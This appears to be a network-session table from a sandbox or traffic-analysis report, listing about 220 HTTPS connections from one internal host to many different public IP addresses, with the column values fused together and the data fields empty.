                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17751192.168.2.2358460132.14.181.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17752192.168.2.234683848.79.136.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17753192.168.2.2359784123.140.107.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17754192.168.2.233389066.155.139.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17755192.168.2.2337306136.167.124.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17756192.168.2.2354838149.77.147.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17757192.168.2.2347606208.216.69.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17758192.168.2.2336954169.61.2.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17759192.168.2.234356681.183.192.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17760192.168.2.2351062104.239.112.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17761192.168.2.2350070144.65.144.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17762192.168.2.234225034.189.165.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17763192.168.2.2340662116.81.60.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17764192.168.2.2342434121.127.88.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17765192.168.2.233635261.103.28.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17766192.168.2.235552025.30.121.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17767192.168.2.235176614.62.19.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17768192.168.2.235493864.183.53.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17769192.168.2.234992494.209.119.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17770192.168.2.23411084.242.25.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17771192.168.2.2349522193.55.3.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17772192.168.2.2359588196.237.48.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17773192.168.2.2345820114.29.68.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17774192.168.2.2335120134.239.110.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17775192.168.2.2336058189.154.228.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17776192.168.2.2342216157.219.226.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17777192.168.2.2359900162.107.62.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17778192.168.2.2340102132.118.133.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17779192.168.2.235279292.106.33.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17780192.168.2.234382635.2.228.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17781192.168.2.2359966136.189.201.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17782192.168.2.234587475.115.30.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17783192.168.2.2338762141.15.79.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17784192.168.2.235432486.114.21.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17785192.168.2.2339362209.127.195.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17786192.168.2.2360088121.222.32.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17787192.168.2.2341414150.148.60.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17788192.168.2.2344104100.132.84.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17789192.168.2.2357722196.20.201.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17790192.168.2.2343704139.47.182.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17791192.168.2.235069446.135.153.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17792192.168.2.2342796187.61.32.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17793192.168.2.235477241.148.165.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17794192.168.2.234384812.63.106.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17795192.168.2.2337176116.194.92.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17796192.168.2.233508881.153.65.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17797192.168.2.2339068111.222.212.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17798192.168.2.2359390168.57.103.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17799192.168.2.2333426174.204.190.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17800192.168.2.2358450192.112.160.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17801192.168.2.2359076107.223.222.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17802192.168.2.2352578174.21.29.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17803192.168.2.2345376164.201.247.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17804192.168.2.2339554170.65.74.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17805192.168.2.2337772169.156.28.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17806192.168.2.233297895.64.6.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17807192.168.2.235460696.212.13.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17808192.168.2.2357214103.237.63.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17809192.168.2.2353546182.117.232.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17810192.168.2.234376853.154.125.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17811192.168.2.235741280.90.34.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17812192.168.2.2337914197.8.210.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17813192.168.2.2340250223.23.4.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17814192.168.2.233672475.29.10.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17815192.168.2.2349078163.163.67.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17816192.168.2.2360640193.133.77.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17817192.168.2.2340982181.214.87.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17818192.168.2.2351410146.18.205.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17819192.168.2.2335164160.45.208.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17820192.168.2.2359504130.220.148.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17821192.168.2.2357416154.45.121.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17822192.168.2.2336686180.154.121.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17823192.168.2.2356188147.138.36.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17824192.168.2.2341446173.197.99.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17825192.168.2.2354026157.151.18.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17826192.168.2.234189064.1.102.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17827192.168.2.2359578114.176.51.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17828192.168.2.233526087.33.54.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17829192.168.2.234846613.133.72.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17830192.168.2.2355272190.2.17.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17831192.168.2.2360478150.0.6.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17832192.168.2.234380034.101.9.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17833192.168.2.2346360172.242.86.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17834192.168.2.2345594102.254.118.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17835192.168.2.235921466.134.21.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17836192.168.2.235115670.149.244.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17837192.168.2.234479823.150.98.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17838192.168.2.2355066163.63.113.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17839192.168.2.233728027.71.140.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17840192.168.2.2332816160.194.96.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17841192.168.2.2352862114.125.231.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17842192.168.2.233424620.180.199.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17843192.168.2.2351286121.207.76.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17844192.168.2.2345206150.143.61.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17845192.168.2.2334674207.54.172.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17846192.168.2.235429685.116.220.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17847192.168.2.2345212206.9.171.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17848192.168.2.233483879.242.240.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17849192.168.2.234601280.30.126.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17850192.168.2.2349154176.120.30.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17851192.168.2.234305861.137.241.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17852192.168.2.2334574146.188.146.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17853192.168.2.2333190103.69.161.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17854192.168.2.2339696191.191.26.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17855192.168.2.235947458.27.165.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17856192.168.2.235168289.233.166.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17857192.168.2.2349282131.207.91.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17858192.168.2.235189875.170.78.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17859192.168.2.234597089.180.217.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17860192.168.2.233732642.96.173.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17861192.168.2.233552843.82.14.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17862192.168.2.23347425.146.188.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17863192.168.2.2341020118.228.40.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17864192.168.2.2347242106.27.57.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17865192.168.2.2345494188.244.196.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17866192.168.2.235956638.201.166.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17867192.168.2.2350996180.215.82.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17868192.168.2.2336478222.110.45.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17869192.168.2.2340016194.153.205.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17870192.168.2.235053464.113.71.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17871192.168.2.2356346117.124.161.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17872192.168.2.2357362180.112.170.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17873192.168.2.2360542133.188.66.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17874192.168.2.235022470.143.111.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17875192.168.2.234096070.124.38.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17876192.168.2.2338542183.225.155.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17877192.168.2.234423680.251.202.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17878192.168.2.2339424141.226.140.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17879192.168.2.235580469.131.52.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17880192.168.2.2342360205.178.168.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17881192.168.2.2351326180.237.43.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17882192.168.2.2333664171.66.182.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17883192.168.2.235307642.17.185.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17884192.168.2.236028817.73.162.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17885192.168.2.2339540194.227.236.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17886192.168.2.2340618211.144.218.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17887192.168.2.2354068159.8.228.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17888192.168.2.235609036.233.31.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17889192.168.2.2346304143.202.182.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17890192.168.2.233810254.241.92.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17891192.168.2.2356814135.64.227.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17892192.168.2.2359272132.89.160.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17893192.168.2.2342518208.21.159.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17894192.168.2.2356644122.89.202.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17895192.168.2.235650080.249.154.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17896192.168.2.235372082.201.62.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17897192.168.2.235488034.100.223.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17898192.168.2.234010088.30.109.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17899192.168.2.2337440101.250.152.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17900192.168.2.234232894.63.216.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17901192.168.2.2333274110.127.140.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17902192.168.2.233298664.8.62.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17903192.168.2.2355732102.189.87.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17904192.168.2.2343496107.65.234.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17905192.168.2.2360878143.223.69.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17906192.168.2.234228439.73.225.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17907192.168.2.23461509.169.97.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17908192.168.2.233930487.66.101.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17909192.168.2.2343738196.7.118.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17910192.168.2.234963240.2.27.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17911192.168.2.2337498164.125.236.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17912192.168.2.235816649.239.190.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17913192.168.2.234576093.233.113.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17914192.168.2.233627887.160.100.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17915192.168.2.234938849.88.64.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17916192.168.2.235093231.219.96.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17917192.168.2.233910248.51.251.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17918192.168.2.2337642183.204.224.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17919192.168.2.235874252.241.173.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17920192.168.2.2339962111.58.241.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17921192.168.2.235989844.127.142.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17922192.168.2.233578417.25.170.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17923192.168.2.2348566192.79.136.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17924192.168.2.2333930217.205.197.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17925192.168.2.2339908194.43.15.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17926192.168.2.234644680.140.213.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17927192.168.2.2358968212.130.180.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17928192.168.2.233865670.215.118.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17929192.168.2.2359896149.11.181.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17930192.168.2.2357022128.42.7.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17931192.168.2.2337428194.185.58.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17932192.168.2.235673865.219.17.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17933192.168.2.2345598111.228.245.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17934192.168.2.236001641.63.66.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17935192.168.2.233846873.192.37.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17936192.168.2.235218657.150.34.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17937192.168.2.234161258.178.47.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17938192.168.2.23539962.13.63.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17939192.168.2.235743444.81.227.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17940192.168.2.233632492.241.229.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17941192.168.2.2352356154.10.95.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17942192.168.2.2356754173.158.4.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17943192.168.2.236079479.100.69.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17944192.168.2.2352758221.149.154.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17945192.168.2.235340090.205.39.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17946192.168.2.2338842107.102.85.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17947192.168.2.2349718104.108.193.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17948192.168.2.2350534115.37.153.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17949192.168.2.23404724.136.88.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17950192.168.2.2339192101.112.160.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17951192.168.2.23523122.25.72.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17952192.168.2.2336248179.154.126.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17953192.168.2.234611623.236.237.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17954192.168.2.2350776213.161.13.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17955192.168.2.2349630153.102.114.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17956192.168.2.2350008105.238.64.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17957192.168.2.2343890171.251.102.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17958192.168.2.235939465.34.92.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17959192.168.2.2355930217.114.242.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17960192.168.2.2357124141.202.71.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17961192.168.2.235839668.89.13.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17962192.168.2.233284089.76.83.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17963192.168.2.233808896.181.88.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17964192.168.2.233404492.28.182.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17965192.168.2.2344606150.157.192.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17966192.168.2.2339362183.244.99.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17967192.168.2.235375271.172.250.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17968192.168.2.2360306139.192.52.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17969192.168.2.2347876134.239.84.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17970192.168.2.2343436219.17.86.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17971192.168.2.2346594120.178.117.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17972192.168.2.2358942188.118.130.149443
